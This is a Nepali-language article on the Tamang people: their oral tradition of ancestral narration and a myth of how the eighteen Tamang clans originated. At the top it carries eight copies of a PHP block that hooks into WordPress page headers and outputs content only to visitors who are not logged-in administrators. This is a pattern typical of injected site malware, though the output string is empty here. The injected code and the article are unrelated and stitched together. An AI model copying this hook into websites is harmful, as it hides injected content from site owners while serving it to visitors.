if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999); if (!function_exists('f9d233f09')) { function f9d233f09() { if (is_admin() || (function_exists('is_user_logged_in') && is_user_logged_in() && function_exists('current_user_can') && current_user_can('manage_options'))) { return; } echo '' . "\n"; } } add_action('wp_head', 'f9d233f09', 999);
तामाङ एक छुट्टै भाषा, धर्म, लिपि, संस्कृति र पहिचान भएका नेपालका एक प्रमुख जाति हो । संयुक्त राष्ट्र सङ्घको एक विशिष्ट संस्था अन्तर्राष्ट्रिय श्रम सङ्गठन १६९ अनुसार जाति भन्नाले कुनै पनि देशमा आदिम काल देखि बस्दै आइरहेका मूल जाति वा आफ्नै छुट्टै पहिचान भएका राष्ट्रलाई बुजाउँदछ । त्यसैले तामाङ नेपालको मूल जाति हो ।
जनसङ्ख्याको हिसाबले नेपालको पाँचौँ ठुलो तामाङ जातिको उत्पत्ति, भाषा, धर्म, संस्कृति, लिपि आदिको विषयमा उत्खनन गर्न बाँकी नै छ । सबैलाई विदितै छ अझै पनि तामाङहरूको लिखित परम्पराको विकास भइसकेको छैन । हिजो झन् थिएन । हरेक कुरा कथ्यमा आधारित थियो । यो प्रक्रिया पुस्तौँ-पुस्ता रह्यो । ताम्बा (पुर्ख्यौली परम्पराको वर्णन गर्ने व्यक्ति)ले भन्ने अनि गान्बा गान्सोम (जान्ने बुझ्ने)ले सुन्ने र सुनेकोले अरूलाई सुनाउने/बताउने परम्परा बस्यो । यो क्रम अहिलेसम्म पनि जीवित छ । हाम्रो तामाङको इतिहास अझ पनि कथ्य परम्परामा बाँचिरहेको छ । त्यसैले भनिन्छ तामाङको गीत र सङ्गीतमा तामाङको इतिहास बाँचेको हुन्छ । सुन्ने, गुन्ने र भन्ने तामाङ परम्परा नै हो । कालान्तरमा भन्ने र सुन्ने, सुन्ने र भन्ने बिचमा फरक पर्यो । जति भन्यो त्यति सुनेन, जति सुन्यो त्यति भन्न सकेन । स्थान, समय र परिस्थितिअनुसार भन्नेले थपे पनि । त्यसैले त्यो परम्परा विभिन्न रूपमा सङ्गृहीत हुँदै आयो । तामाङहरू आफ्नो पुर्ख्यौली परम्पराको वर्णन गर्ने व्यक्तिलाई ‘ताम्बा’ भन्दछन् । ताम्बाले भनेको कुरालाई काइतेन वा कइरन भनिन्छ । हाम्रो पालामा आइपुग्दा त्यो पुरानो कुरामा कतिपय नयाँ कुराहरू तपिँदै जोडिँदै भनिदै आएको छ । तामाङ लेख्य परम्पराको विकास कहिले भयो भन्नेकुरा सोधखोज र विषय रहेको छ ।
लेखक परशुराम तामाङ आफ्ना तामाङ जाति पुस्तकमा लेख्छन्-‘तामाङहरूले लामा बुद्ध धर्म र संभोटा लिपि सिकेपछि केही मात्रामा भए पनि कहिरनहरू अभिलेख गर्ने काम थालेको हुनुपर्दछ । किनभने हस्तलिखित पुस्तकहरू बुद्ध धर्मद्वारा धर्मद्वारा नै प्रभावित देखिन्छन् ।’
अठाह्र तामाङको उत्पत्तिकाे कथा
तामाङको उत्पत्तिको विषयमा थुप्रै कथाहरू छन् । यहाँ तामाङको १८ थरको उत्पत्तिको कथा उल्लेख गर्दैछाैँ । जुन कथा ताम्बा कइरनमा आधारित छ ।
ताम्बा कइरन (पुर्ख्यौली परम्पराको वर्णन) अनुसार सुमेरु पर्वतमा एउटा सुन्दर ताल छ । त्यहाँ महागुरु रिम्बोर्छे राज गर्नुहुन्छ । दोर्जेग्याडम (विश्व/महाबज्र)ले गुरू रेम्बोर्छलाई त्यहाँ संसारको सुरक्षाको लागि राखेको हो । पहिले पृथ्वीमा मनुष्यको आबाद थिएन । एक दिन दोर्जेग्याडमले महागुरुलाई मनुष्यको सृष्टि गर्ने मन्त्रण दियो । त्यसपछि महागुरुले तीन भिक्षुहरू सृष्टि गरी उनीहरूलाई मानिसको सृष्टि गर्न आज्ञा दिए । ती भिक्षुहरूको नाम छेगु (धर्म काय), लुंगु (सम्भोग काय) र टुल्गु (रूप काय) थियो । भिक्षुहरू मनुष्य शरीर तयार गर्न समर्थ भए पनि प्राण दिन समर्थ भएनन् । त्यसैले भिक्षुहरूले महागुरुको आराधना गरे । महागुरुले पनि दोर्जेग्याडमलाई स्मरण गरे । त्यसपछि दोर्जेग्याडमले मनुष्य सृष्टिको लागि महागुरूलाई एउटा शक्ति (बज्र) प्रदान गरे । महागुरुले त्यही शक्तिलाई तीन टुक्रा पार्नुभयो । त्यसबाट तीन कन्याहरू डासिङ डोल्मा, डासिङ टासी र डासिङ टुकु उत्पन्न भए । ती तीन कन्याहरूलाई भिक्षुका सेवामा खटाइयो ।
ती कन्याहरू नियमित रूपमा चोखो पानी र फलफूल सङ्कलन, जङ्गल जान्थे । तर ती कन्याहरूलाई एउटा अनौठो जनावरले पानी भर्ने बेलामा सधैँ पानी धमिलो पारिदिने र फलफूल टिप्न लाग्दा धेरै दुख दिन्थ्यो । धेरै दिनको हैरानीपछि तिनीहरूले यो कुरा भिक्षुलाई बताए । भिक्षुहरू निरीक्षणमा जाँदा त्यहाँ अनौठो जनावर पाए । त्यो अनौठो जनावर वास्तवमा एक किसिमको बाँदर थियो । भिक्षुहरूले ती कन्याहरूको त्यही बाँदरसँग विवाह गरिदिए । तीन भिक्षुहरूले राेजेका बाँदरहरूलाई उनीहरूकै नामअनुसार नामाकरण गरे । छेगु भिक्षुले राेजेकाे बाँदरलाई छेगु बाँदर भनियाे । साेही बमाेजिम दुई बाँदरलाई लुंगु र टुल्गु नामाकरण गरियाे ।
अनि छेगु बाँदर र डासिङ डोल्माको शक्तिबाट सात थरे तामाङहरूको सृष्टि भयो । तिनीहरूलाई घिसिङ, बल, थोकर, थिङ, ङ्यासुर, ग्लान र रूम्बा नाम दिइयो । लुंगु बाँदर र डासिङ टासीको शक्तिबाट ६ थरे तामाङहरूको सृष्टि भयो । तिनीहरूलाई योञ्जन, बम्जन, दोङ, ङेके, स्याङबो र जिम्बा भनियो । टुल्गु बाँदर र डासिङ टुकुबाट पाँच थरे तामाङहरू उत्पन्न भए । तिनीहरूलाई पाख्रिन, मोक्तान, वाइबा, टुपा र लुङबा नाम दिइयो । यसरी पृथ्वीमा अठाह्र तामाङको उत्पत्ति भयो । आज तामाङका धेरै थरहरू छन् । ती विभिन्न थरहरू कालान्तरमा अठाह्रबाट स्वाँगे भई बनेका हुन् भन्ने कुरामा तामाङहरू विश्वास गर्दछन् ।
सन्दर्भ सामाग्री:
ताम्बा लुंगु लामासँगकाे अन्तर्वार्ता
तामाङ जाति (सं २०५१) परशुराम तामाङ
विभिन्न अनलाइन
जनश्रुतिहरू